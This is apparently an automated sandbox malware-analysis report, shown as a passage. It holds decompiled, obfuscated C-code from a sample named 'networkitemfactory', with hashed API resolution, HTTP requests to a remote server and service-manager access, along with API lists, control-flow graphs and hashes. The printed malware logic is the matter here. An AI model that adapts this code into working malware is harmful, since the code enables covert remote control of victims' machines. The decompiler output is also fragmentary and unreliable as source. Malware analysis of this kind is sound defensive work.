                                                                                                      						} else {
                                                                                                      							_t149 = _t134 - 0x11ed8c49;
                                                                                                      							if(_t149 > 0) {
                                                                                                      								__eflags = _t134 - 0x16d9e4dd;
                                                                                                      								if(_t134 == 0x16d9e4dd) {
                                                                                                      									__eflags =  *0x20be158;
                                                                                                      									if( *0x20be158 == 0) {
                                                                                                      										 *0x20be158 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0xe7ee7f60, _t144);
                                                                                                      									}
                                                                                                      									_t39 = InternetOpenW(_v36, 0, 0, 0, 0); // executed
                                                                                                      									__eflags = _t39;
                                                                                                      									_v48 = _t39;
                                                                                                      									_t134 =  !=  ? 0x33d5fcd3 : 0x2a671f30;
                                                                                                      									_t41 =  *0x20bddc8;
                                                                                                      									__eflags = _t41;
                                                                                                      									if(_t41 == 0) {
                                                                                                      										_t41 = E020B3DD0(_t83, E020B3E70(0xbb51e2dc), 0x298e8809, _t144);
                                                                                                      										 *0x20bddc8 = _t41;
                                                                                                      									}
                                                                                                      									_t133 =  *_t41();
                                                                                                      									_t43 =  *0x20bdbec;
                                                                                                      									__eflags = _t43;
                                                                                                      									if(_t43 == 0) {
                                                                                                      										_t43 = E020B3DD0(_t83, E020B3E70(0xbb51e2dc), 0x632f374, _t144);
                                                                                                      										 *0x20bdbec = _t43;
                                                                                                      									}
                                                                                                      									 *_t43(_t133, 0, _v56);
                                                                                                      									goto L32;
                                                                                                      								} else {
                                                                                                      									__eflags = _t134 - 0x1cdfe022;
                                                                                                      									if(_t134 != 0x1cdfe022) {
                                                                                                      										goto L32;
                                                                                                      									} else {
                                                                                                      										__eflags =  *0x20bdcf4;
                                                                                                      										if( *0x20bdcf4 == 0) {
                                                                                                      											 *0x20bdcf4 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0x4983c7b3, _t144);
                                                                                                      										}
                                                                                                      										InternetCloseHandle(_t83); // executed
                                                                                                      										_t134 = 0x3aea9dcf;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t149 == 0) {
                                                                                                      									_t49 =  *0x20be25c; // 0x0
                                                                                                      									_v16 = 4;
                                                                                                      									__eflags = _t49;
                                                                                                      									if(_t49 == 0) {
                                                                                                      										_t49 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0x66e34725, _t144);
                                                                                                      										 *0x20be25c = _t49;
                                                                                                      									}
                                                                                                      									_t50 =  *_t49(_t83, 0x20000013,  &_v12,  &_v16, 0);
                                                                                                      									__eflags = _t50;
                                                                                                      									if(_t50 == 0) {
                                                                                                      										L46:
                                                                                                      										_t134 = 0x1cdfe022;
                                                                                                      										continue;
                                                                                                      									} else {
                                                                                                      										__eflags = _v32 - 0xc8;
                                                                                                      										if(_v32 != 0xc8) {
                                                                                                      											goto L46;
                                                                                                      										} else {
                                                                                                      											_t134 = 0x293d6772;
                                                                                                      											continue;
                                                                                                      										}
                                                                                                      									}
                                                                                                      									L65:
                                                                                                      								} else {
                                                                                                      									if(_t134 == 0xb17a9aa) {
                                                                                                      										_t51 =  *0x20bdcf4;
                                                                                                      										__eflags = _t51;
                                                                                                      										if(_t51 == 0) {
                                                                                                      											_t51 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0x4983c7b3, _t144);
                                                                                                      											 *0x20bdcf4 = _t51;
                                                                                                      										}
                                                                                                      										 *_t51(_v28);
                                                                                                      									} else {
                                                                                                      										if(_t134 != 0x119a0a0d) {
                                                                                                      											L32:
                                                                                                      											__eflags = _t134 - 0x2a671f30;
                                                                                                      											if(_t134 != 0x2a671f30) {
                                                                                                      												while(1) {
                                                                                                      													L1:
                                                                                                      													_t131 = _v32;
                                                                                                      													goto L2;
                                                                                                      												}
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											_v24 = 0x200;
                                                                                                      											_t143 = E020B4220(_t83, 0x200);
                                                                                                      											if(_t143 != 0) {
                                                                                                      												_t68 =  *0x20bdd30;
                                                                                                      												if(_t68 == 0) {
                                                                                                      													_t68 = E020B3DD0(_t83, E020B3E70(0x50a1919d), 0xf19af18a, _t144);
                                                                                                      													 *0x20bdd30 = _t68;
                                                                                                      												}
                                                                                                      												_t69 =  *_t68(0, _t143,  &_v24); // executed
                                                                                                      												if(_t69 == 0) {
                                                                                                      													_t71 = E020B5620(_t143, _t144);
                                                                                                      													_t145 = _t145 - 8 + 8;
                                                                                                      													_v48 = _t71;
                                                                                                      												}
                                                                                                      												E020B4180(_t83, _t143);
                                                                                                      											}
                                                                                                      											_t134 = 0x16d9e4dd;
                                                                                                      											while(1) {
                                                                                                      												L2:
                                                                                                      												_t148 = _t134 - 0x25b8da46;
                                                                                                      												if(_t148 > 0) {
                                                                                                      													goto L35;
                                                                                                      												}
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      											goto L35;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L64:
                                                                                                      						return _v40;
                                                                                                      						goto L65;
                                                                                                      						L35:
                                                                                                      						__eflags = _t134 - 0x33d5fcd3;
                                                                                                      						if(__eflags > 0) {
                                                                                                      							__eflags = _t134 - 0x368f38e4;
                                                                                                      							if(_t134 == 0x368f38e4) {
                                                                                                      								__eflags = _t144;
                                                                                                      								if(_t144 == 0) {
                                                                                                      									_t135 = 0;
                                                                                                      									_t132 = 0;
                                                                                                      									__eflags = 0;
                                                                                                      								} else {
                                                                                                      									_t135 = _a4;
                                                                                                      									_t132 =  *_t144;
                                                                                                      								}
                                                                                                      								__eflags =  *0x20be200;
                                                                                                      								if( *0x20be200 == 0) {
                                                                                                      									 *0x20be200 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0x38dee054, _t144);
                                                                                                      								}
                                                                                                      								_t36 = HttpSendRequestW(_t83, _a8, 0xffffffff, _t132, _t135); // executed
                                                                                                      								asm("sbb esi, esi");
                                                                                                      								_t134 = ( ~_t36 & 0xf50dac27) + 0x1cdfe022;
                                                                                                      								goto L1;
                                                                                                      							} else {
                                                                                                      								__eflags = _t134 - 0x3aea9dcf;
                                                                                                      								if(_t134 != 0x3aea9dcf) {
                                                                                                      									goto L32;
                                                                                                      								} else {
                                                                                                      									_t45 =  *0x20bdcf4;
                                                                                                      									__eflags = _t45;
                                                                                                      									if(_t45 == 0) {
                                                                                                      										_t45 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0x4983c7b3, _t144);
                                                                                                      										 *0x20bdcf4 = _t45;
                                                                                                      									}
                                                                                                      									 *_t45(_t131);
                                                                                                      									_t134 = 0xb17a9aa;
                                                                                                      									continue;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						} else {
                                                                                                      							if(__eflags == 0) {
                                                                                                      								__eflags =  *0x20bdd34;
                                                                                                      								if( *0x20bdd34 == 0) {
                                                                                                      									 *0x20bdd34 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0x68358982, _t144);
                                                                                                      								}
                                                                                                      								_t56 = InternetConnectW(_v28, _v4, _v8, 0, 0, 3, 0, 0); // executed
                                                                                                      								_t131 = _t56;
                                                                                                      								__eflags = _t131;
                                                                                                      								_v64 = _t131;
                                                                                                      								_t134 =  !=  ? 0x2e4782de : 0xb17a9aa;
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								__eflags = _t134 - 0x293d6772;
                                                                                                      								if(_t134 == 0x293d6772) {
                                                                                                      									__eflags = E020B2930(_t83, _a16);
                                                                                                      									_t108 =  !=  ? 1 : _v40;
                                                                                                      									_v40 =  !=  ? 1 : _v40;
                                                                                                      									goto L46;
                                                                                                      								} else {
                                                                                                      									__eflags = _t134 - 0x2e4782de;
                                                                                                      									if(_t134 != 0x2e4782de) {
                                                                                                      										goto L32;
                                                                                                      									} else {
                                                                                                      										__eflags = _t144;
                                                                                                      										if(_t144 == 0) {
                                                                                                      											_t140 = _v20;
                                                                                                      										} else {
                                                                                                      											_t140 = E020B3460(0x20bd290);
                                                                                                      											_v20 = _t140;
                                                                                                      										}
                                                                                                      										_t60 =  *0x20bde94;
                                                                                                      										__eflags = _t60;
                                                                                                      										if(_t60 == 0) {
                                                                                                      											_t60 = E020B3DD0(_t83, E020B3E70(0x2bcd54a8), 0xe1c7cef6, _t144);
                                                                                                      											 *0x20bde94 = _t60;
                                                                                                      										}
                                                                                                      										_t83 =  *_t60(_t131, _t140, _a4, 0, 0, 0, 0x844cc300, 0);
                                                                                                      										E020B3400(_t140);
                                                                                                      										__eflags = _t83;
                                                                                                      										_t134 =  !=  ? 0x368f38e4 : 0x3aea9dcf;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						goto L64;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}











































                                                                                                      0x020b2ba0
                                                                                                      0x020b2ba5
                                                                                                      0x020b2bac
                                                                                                      0x020b2bb0
                                                                                                      0x020b2bb5
                                                                                                      0x020b2bba
                                                                                                      0x020b2bbe
                                                                                                      0x020b2bc6
                                                                                                      0x020b2bce
                                                                                                      0x020b2bd6
                                                                                                      0x020b2bda
                                                                                                      0x020b2bda
                                                                                                      0x020b2bda
                                                                                                      0x020b2be0
                                                                                                      0x020b2be0
                                                                                                      0x020b2be0
                                                                                                      0x020b2be6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b2bec
                                                                                                      0x020b2bec
                                                                                                      0x020b2dd8
                                                                                                      0x00000000
                                                                                                      0x020b2bf2
                                                                                                      0x020b2bf2
                                                                                                      0x020b2bf8
                                                                                                      0x020b2ce8
                                                                                                      0x020b2cee
                                                                                                      0x020b2d32
                                                                                                      0x020b2d34
                                                                                                      0x020b2d4c
                                                                                                      0x020b2d4c
                                                                                                      0x020b2d5d
                                                                                                      0x020b2d5f
                                                                                                      0x020b2d61
                                                                                                      0x020b2d6f
                                                                                                      0x020b2d72
                                                                                                      0x020b2d77
                                                                                                      0x020b2d79
                                                                                                      0x020b2d8c
                                                                                                      0x020b2d91
                                                                                                      0x020b2d91
                                                                                                      0x020b2d98
                                                                                                      0x020b2d9a
                                                                                                      0x020b2d9f
                                                                                                      0x020b2da1
                                                                                                      0x020b2db4
                                                                                                      0x020b2db9
                                                                                                      0x020b2db9
                                                                                                      0x020b2dc5
                                                                                                      0x00000000
                                                                                                      0x020b2cf0
                                                                                                      0x020b2cf0
                                                                                                      0x020b2cf6
                                                                                                      0x00000000
                                                                                                      0x020b2cfc
                                                                                                      0x020b2d01
                                                                                                      0x020b2d03
                                                                                                      0x020b2d1b
                                                                                                      0x020b2d1b
                                                                                                      0x020b2d21
                                                                                                      0x020b2d23
                                                                                                      0x00000000
                                                                                                      0x020b2d23
                                                                                                      0x020b2cf6
                                                                                                      0x020b2bfe
                                                                                                      0x020b2bfe
                                                                                                      0x020b2c88
                                                                                                      0x020b2c8d
                                                                                                      0x020b2c95
                                                                                                      0x020b2c97
                                                                                                      0x020b2caa
                                                                                                      0x020b2caf
                                                                                                      0x020b2caf
                                                                                                      0x020b2cc6
                                                                                                      0x020b2cc8
                                                                                                      0x020b2cca
                                                                                                      0x020b2e91
                                                                                                      0x020b2e91
                                                                                                      0x00000000
                                                                                                      0x020b2cd0
                                                                                                      0x020b2cd0
                                                                                                      0x020b2cd8
                                                                                                      0x00000000
                                                                                                      0x020b2cde
                                                                                                      0x020b2cde
                                                                                                      0x00000000
                                                                                                      0x020b2cde
                                                                                                      0x020b2cd8
                                                                                                      0x00000000
                                                                                                      0x020b2c04
                                                                                                      0x020b2c0a
                                                                                                      0x020b2f8c
                                                                                                      0x020b2f91
                                                                                                      0x020b2f93
                                                                                                      0x020b2fa6
                                                                                                      0x020b2fab
                                                                                                      0x020b2fab
                                                                                                      0x020b2fb4
                                                                                                      0x020b2c10
                                                                                                      0x020b2c16
                                                                                                      0x020b2dc7
                                                                                                      0x020b2dc7
                                                                                                      0x020b2dcd
                                                                                                      0x020b2bda
                                                                                                      0x020b2bda
                                                                                                      0x020b2bda
                                                                                                      0x00000000
                                                                                                      0x020b2bda
                                                                                                      0x020b2bda
                                                                                                      0x020b2c1c
                                                                                                      0x020b2c21
                                                                                                      0x020b2c2e
                                                                                                      0x020b2c32
                                                                                                      0x020b2c34
                                                                                                      0x020b2c3b
                                                                                                      0x020b2c4e
                                                                                                      0x020b2c53
                                                                                                      0x020b2c53
                                                                                                      0x020b2c60
                                                                                                      0x020b2c64
                                                                                                      0x020b2c6b
                                                                                                      0x020b2c70
                                                                                                      0x020b2c73
                                                                                                      0x020b2c73
                                                                                                      0x020b2c79
                                                                                                      0x020b2c79
                                                                                                      0x020b2c7e
                                                                                                      0x020b2be0
                                                                                                      0x020b2be0
                                                                                                      0x020b2be0
                                                                                                      0x020b2be6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b2be6
                                                                                                      0x00000000
                                                                                                      0x020b2be0
                                                                                                      0x020b2c16
                                                                                                      0x020b2c0a
                                                                                                      0x020b2bfe
                                                                                                      0x020b2bf8
                                                                                                      0x020b2fb6
                                                                                                      0x020b2fc1
                                                                                                      0x00000000
                                                                                                      0x020b2de2
                                                                                                      0x020b2de2
                                                                                                      0x020b2de8
                                                                                                      0x020b2ef1
                                                                                                      0x020b2ef7
                                                                                                      0x020b2f36
                                                                                                      0x020b2f38
                                                                                                      0x020b2f42
                                                                                                      0x020b2f44
                                                                                                      0x020b2f44
                                                                                                      0x020b2f3a
                                                                                                      0x020b2f3a
                                                                                                      0x020b2f3d
                                                                                                      0x020b2f3d
                                                                                                      0x020b2f4b
                                                                                                      0x020b2f4d
                                                                                                      0x020b2f65
                                                                                                      0x020b2f65
                                                                                                      0x020b2f73
                                                                                                      0x020b2f79
                                                                                                      0x020b2f81
                                                                                                      0x00000000
                                                                                                      0x020b2ef9
                                                                                                      0x020b2ef9
                                                                                                      0x020b2eff
                                                                                                      0x00000000
                                                                                                      0x020b2f05
                                                                                                      0x020b2f05
                                                                                                      0x020b2f0a
                                                                                                      0x020b2f0c
                                                                                                      0x020b2f1f
                                                                                                      0x020b2f24
                                                                                                      0x020b2f24
                                                                                                      0x020b2f2a
                                                                                                      0x020b2f2c
                                                                                                      0x00000000
                                                                                                      0x020b2f2c
                                                                                                      0x020b2eff
                                                                                                      0x020b2dee
                                                                                                      0x020b2dee
                                                                                                      0x020b2ea0
                                                                                                      0x020b2ea2
                                                                                                      0x020b2eba
                                                                                                      0x020b2eba
                                                                                                      0x020b2ed5
                                                                                                      0x020b2ed7
                                                                                                      0x020b2ede
                                                                                                      0x020b2ee0
                                                                                                      0x020b2ee9
                                                                                                      0x00000000
                                                                                                      0x020b2df4
                                                                                                      0x020b2df4
                                                                                                      0x020b2dfa
                                                                                                      0x020b2e83
                                                                                                      0x020b2e8a
                                                                                                      0x020b2e8d
                                                                                                      0x00000000
                                                                                                      0x020b2dfc
                                                                                                      0x020b2dfc
                                                                                                      0x020b2e02
                                                                                                      0x00000000
                                                                                                      0x020b2e04
                                                                                                      0x020b2e04
                                                                                                      0x020b2e06
                                                                                                      0x020b2e1a
                                                                                                      0x020b2e08
                                                                                                      0x020b2e12
                                                                                                      0x020b2e14
                                                                                                      0x020b2e14
                                                                                                      0x020b2e1e
                                                                                                      0x020b2e23
                                                                                                      0x020b2e25
                                                                                                      0x020b2e38
                                                                                                      0x020b2e3d
                                                                                                      0x020b2e3d
                                                                                                      0x020b2e59
                                                                                                      0x020b2e5b
                                                                                                      0x020b2e60
                                                                                                      0x020b2e6c
                                                                                                      0x00000000
                                                                                                      0x020b2e6c
                                                                                                      0x020b2e02
                                                                                                      0x020b2dfa
                                                                                                      0x020b2dee
                                                                                                      0x00000000
                                                                                                      0x020b2de8
                                                                                                      0x020b2be0

                                                                                                      APIs
                                                                                                      • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 020B2C60
                                                                                                      • InternetCloseHandle.WININET(?), ref: 020B2D21
                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 020B2D5D
                                                                                                      • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 020B2ED5
                                                                                                      • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 020B2F73
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                                                                                      • String ID: %Gf$rg=)$rg=)
                                                                                                      • API String ID: 1741791824-1613875595
                                                                                                      • Opcode ID: a764952f82d38bc649dfc5dd17d2bc81f9fc7325c0768def6aab1eef238fdc44
                                                                                                      • Instruction ID: b508021b1c3bad5a185ca98385d9949e046af67af6cf4712c697021b9bb97e57
                                                                                                      • Opcode Fuzzy Hash: a764952f82d38bc649dfc5dd17d2bc81f9fc7325c0768def6aab1eef238fdc44
                                                                                                      • Instruction Fuzzy Hash: FFA1D335B043019FDB77AF789894BEB76E6AF84344F11082AED55EB390DB749C009B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 427 401880-4018dd call 4025d7 430 4018e0-4018eb 427->430 430->430 431 4018ed-401919 LoadLibraryA GetProcAddress 430->431 432 40191c-40191e 431->432 433 401920-40192e call 4023ff 432->433 434 40192f-401951 call 4023ff 432->434
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 004018D3
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00520000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • LoadLibraryA.KERNELBASE(ADVAPI32.DLL,00000000), ref: 004018F8
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004018FF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAllocateHeapLibraryLoadProc_malloc
                                                                                                      • String ID: ADVAPI32.DLL
                                                                                                      • API String ID: 4139351243-33758204
                                                                                                      • Opcode ID: 670f09e3d8b638425d01283d12b95ed64893a93a4cb3760ffa5b5eff12202f68
                                                                                                      • Instruction ID: 77864cb31303051aa4bb0e4ba01d51cb444543d451e6ae4c272d0dd7b7c99e89
                                                                                                      • Opcode Fuzzy Hash: 670f09e3d8b638425d01283d12b95ed64893a93a4cb3760ffa5b5eff12202f68
                                                                                                      • Instruction Fuzzy Hash: E6212631E5038895EB10DFA8AD47BFDBB74AF49700F50127AED85BA1C1EAB45648C3D8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 547 20b9700-20b9717 548 20b9720-20b9725 547->548 549 20b972b 548->549 550 20b986a-20b986f 548->550 551 20b981b-20b9823 549->551 552 20b9731-20b9736 549->552 553 20b992f-20b9934 550->553 554 20b9875 550->554 557 20b9843-20b9857 551->557 558 20b9825-20b983d call 20b3e70 call 20b3dd0 551->558 559 20b97f9-20b97fe 552->559 560 20b973c 552->560 555 20b993a-20b997d 553->555 556 20b9804-20b9809 553->556 561 20b98de-20b98e5 554->561 562 20b9877-20b987c 554->562 555->548 556->548 564 20b980f-20b981a 556->564 582 20b985b-20b9865 557->582 558->557 559->556 563 20b9982-20b9989 559->563 568 20b973e-20b9743 560->568 569 20b97a5-20b97ac 560->569 566 20b9902-20b992a call 20b3c90 561->566 567 20b98e7-20b98fd call 20b3e70 call 20b3dd0 561->567 570 20b98cf-20b98d9 call 20b7c20 562->570 571 20b987e-20b9883 562->571 573 20b998b-20b99a1 call 20b3e70 call 20b3dd0 563->573 574 20b99a6-20b99b1 563->574 566->548 567->566 580 20b9745-20b974a 568->580 581 20b9774-20b977b 568->581 578 20b97c9-20b97d8 OpenSCManagerW 569->578 579 20b97ae-20b97c4 call 20b3e70 call 20b3dd0 569->579 570->548 571->556 572 20b9889-20b98ca 571->572 572->548 573->574 598 20b99b5-20b99c9 call 20b3000 574->598 590 20b97da-20b97ea 578->590 591 20b97ef-20b97f4 578->591 579->578 580->556 588 20b9750-20b9761 call 20b4220 580->588 592 20b9798-20b97a0 581->592 593 20b977d-20b9793 call 20b3e70 call 20b3dd0 581->593 582->548 614 20b99cc-20b99d7 588->614 615 20b9767-20b9772 588->615 590->548 591->548 592->548 593->592 598->614 615->548
                                                                                                      C-Code - Quality: 73%
                                                                                                      			E020B9700() {
                                                                                                      				char _v524;
                                                                                                      				signed int _v528;
                                                                                                      				char _v536;
                                                                                                      				void* _v544;
                                                                                                      				void* __ebx;
                                                                                                      				void* _t37;
                                                                                                      				void* _t45;
                                                                                                      				intOrPtr _t47;
                                                                                                      				intOrPtr _t50;
                                                                                                      				intOrPtr _t51;
                                                                                                      				void* _t54;
                                                                                                      				void* _t57;
                                                                                                      				intOrPtr _t59;
                                                                                                      				void* _t65;
                                                                                                      				intOrPtr _t66;
                                                                                                      				void* _t69;
                                                                                                      				intOrPtr* _t72;
                                                                                                      				intOrPtr _t73;
                                                                                                      				void* _t74;
                                                                                                      				intOrPtr _t91;
                                                                                                      				void* _t102;
                                                                                                      				void* _t103;
                                                                                                      				void* _t104;
                                                                                                      				void* _t107;
                                                                                                      				void* _t108;
                                                                                                      
                                                                                                      				_t103 = _v528;
                                                                                                      				_t37 = 0x582bf38;
                                                                                                      				_t102 = 0;
                                                                                                      				_t2 = _t102 + 1; // 0x1
                                                                                                      				_t73 = _t2;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t107 = _t37 - 0x16beef78;
                                                                                                      						if(_t107 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t107 == 0) {
                                                                                                      							_t74 =  *0x20bde30;
                                                                                                      							__eflags = _t74;
                                                                                                      							if(_t74 == 0) {
                                                                                                      								_t74 = E020B3DD0(_t73, E020B3E70(0xf9ab61cb), 0x423474ef, _t104);
                                                                                                      								 *0x20bde30 = _t74;
                                                                                                      							}
                                                                                                      							_t51 =  *0x20be368; // 0x54d130
                                                                                                      							_t54 =  *_t74(0, _v528, 0, 0, _t51 + 0x220); // executed
                                                                                                      							__eflags = _t54;
                                                                                                      							_t37 = 0x1957e2ae;
                                                                                                      							_t102 =  ==  ? _t73 : _t102;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							_t108 = _t37 - 0x58c56de;
                                                                                                      							if(_t108 > 0) {
                                                                                                      								__eflags = _t37 - 0x916b55c;
                                                                                                      								if(_t37 == 0x916b55c) {
                                                                                                      									_t57 =  *0x20bde30;
                                                                                                      									__eflags = _t57;
                                                                                                      									if(_t57 == 0) {
                                                                                                      										_t57 = E020B3DD0(_t73, E020B3E70(0xf9ab61cb), 0x423474ef, _t104);
                                                                                                      										 *0x20bde30 = _t57;
                                                                                                      									}
                                                                                                      									 *_t57(0, 0x25, 0, 0,  &_v524);
                                                                                                      									_t59 =  *0x20be368; // 0x54d130
                                                                                                      									__eflags = _t59 + 0x440;
                                                                                                      									E020B3000(_t59 + 0x440);
                                                                                                      									goto L37;
                                                                                                      								} else {
                                                                                                      									goto L18;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t108 == 0) {
                                                                                                      									__eflags =  *0x20bdcb4;
                                                                                                      									if( *0x20bdcb4 == 0) {
                                                                                                      										 *0x20bdcb4 = E020B3DD0(_t73, E020B3E70(0x60f9cb2), 0x5f982ae8, _t104);
                                                                                                      									}
                                                                                                      									_t65 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                                      									_t103 = _t65;
                                                                                                      									__eflags = _t103;
                                                                                                      									if(_t103 == 0) {
                                                                                                      										_t37 = 0x1a3f7140;
                                                                                                      									} else {
                                                                                                      										_t66 =  *0x20be368; // 0x54d130
                                                                                                      										 *((intOrPtr*)(_t66 + 0x478)) = _t73;
                                                                                                      										_t37 = 0x24e7c50b;
                                                                                                      									}
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									if(_t37 == 0x1fdbe7c) {
                                                                                                      										_t69 =  *0x20bdd78;
                                                                                                      										__eflags = _t69;
                                                                                                      										if(_t69 == 0) {
                                                                                                      											_t69 = E020B3DD0(_t73, E020B3E70(0x60f9cb2), 0x70adb3c9, _t104);
                                                                                                      											 *0x20bdd78 = _t69;
                                                                                                      										}
                                                                                                      										 *_t69(_t103);
                                                                                                      										_t37 = 0x16beef78;
                                                                                                      										continue;
                                                                                                      									} else {
                                                                                                      										if(_t37 != 0x582bf38) {
                                                                                                      											goto L18;
                                                                                                      										} else {
                                                                                                      											_t72 = E020B4220(_t73, 0x47c);
                                                                                                      											 *0x20be368 = _t72;
                                                                                                      											if(_t72 == 0) {
                                                                                                      												L37:
                                                                                                      												return _t102;
                                                                                                      											} else {
                                                                                                      												 *_t72 = E020B7E10;
                                                                                                      												_t37 = 0x58c56de;
                                                                                                      												continue;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L38:
                                                                                                      					}
                                                                                                      					__eflags = _t37 - 0x1e34e32a;
                                                                                                      					if(__eflags > 0) {
                                                                                                      						__eflags = _t37 - 0x24e7c50b;
                                                                                                      						if(_t37 != 0x24e7c50b) {
                                                                                                      							goto L18;
                                                                                                      						} else {
                                                                                                      							_v528 = 0x2015;
                                                                                                      							_v528 = _v528 * 0x2e;
                                                                                                      							_v528 = _v528 + _v528 * 4 + _v528 + _v528 * 4;
                                                                                                      							_t37 = 0x1fdbe7c;
                                                                                                      							_v528 = (_v528 - (0xa41a41a5 * _v528 >> 0x20) >> 1) + (0xa41a41a5 * _v528 >> 0x20) >> 6;
                                                                                                      							_v528 = _v528 ^ 0x0000bd1a;
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(__eflags == 0) {
                                                                                                      							_t45 =  *0x20be028;
                                                                                                      							__eflags = _t45;
                                                                                                      							if(_t45 == 0) {
                                                                                                      								_t45 = E020B3DD0(_t73, E020B3E70(0xbb51e2dc), 0x2bebef82, _t104);
                                                                                                      								 *0x20be028 = _t45;
                                                                                                      							}
                                                                                                      							 *_t45(0,  &_v524, 0x104);
                                                                                                      							_t47 = E020B3C90( &_v536);
                                                                                                      							_t91 =  *0x20be368; // 0x54d130
                                                                                                      							 *((intOrPtr*)(_t91 + 0x42c)) = _t47;
                                                                                                      							_t37 = 0x916b55c;
                                                                                                      							goto L1;
                                                                                                      						} else {
                                                                                                      							__eflags = _t37 - 0x1957e2ae;
                                                                                                      							if(_t37 == 0x1957e2ae) {
                                                                                                      								E020B7C20(_t104);
                                                                                                      								_t37 = 0x1e34e32a;
                                                                                                      								goto L1;
                                                                                                      							} else {
                                                                                                      								__eflags = _t37 - 0x1a3f7140;
                                                                                                      								if(_t37 != 0x1a3f7140) {
                                                                                                      									goto L18;
                                                                                                      								} else {
                                                                                                      									_v528 = 0xb522;
                                                                                                      									_v528 = _v528 | 0xc076dc4c;
                                                                                                      									_v528 = _v528 + 0xfffff316;
                                                                                                      									_v528 = _v528 | 0x16bc97f1;
                                                                                                      									_v528 = _v528 + 0x41f8;
                                                                                                      									_v528 = _v528 ^ 0xd6ff39f1;
                                                                                                      									_t50 =  *0x20be368; // 0x54d130
                                                                                                      									 *((intOrPtr*)(_t50 + 4)) = 0x20b7e00;
                                                                                                      									_t37 = 0x16beef78;
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L38;
                                                                                                      					L18:
                                                                                                      					__eflags = _t37 - 0x4d0843c;
                                                                                                      				} while (_t37 != 0x4d0843c);
                                                                                                      				return _t102;
                                                                                                      				goto L38;
                                                                                                      			}




























                                                                                                      0x020b9708
                                                                                                      0x020b970c
                                                                                                      0x020b9712
                                                                                                      0x020b9714
                                                                                                      0x020b9714
                                                                                                      0x020b9717
                                                                                                      0x020b9720
                                                                                                      0x020b9720
                                                                                                      0x020b9720
                                                                                                      0x020b9720
                                                                                                      0x020b9725
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b972b
                                                                                                      0x020b981b
                                                                                                      0x020b9821
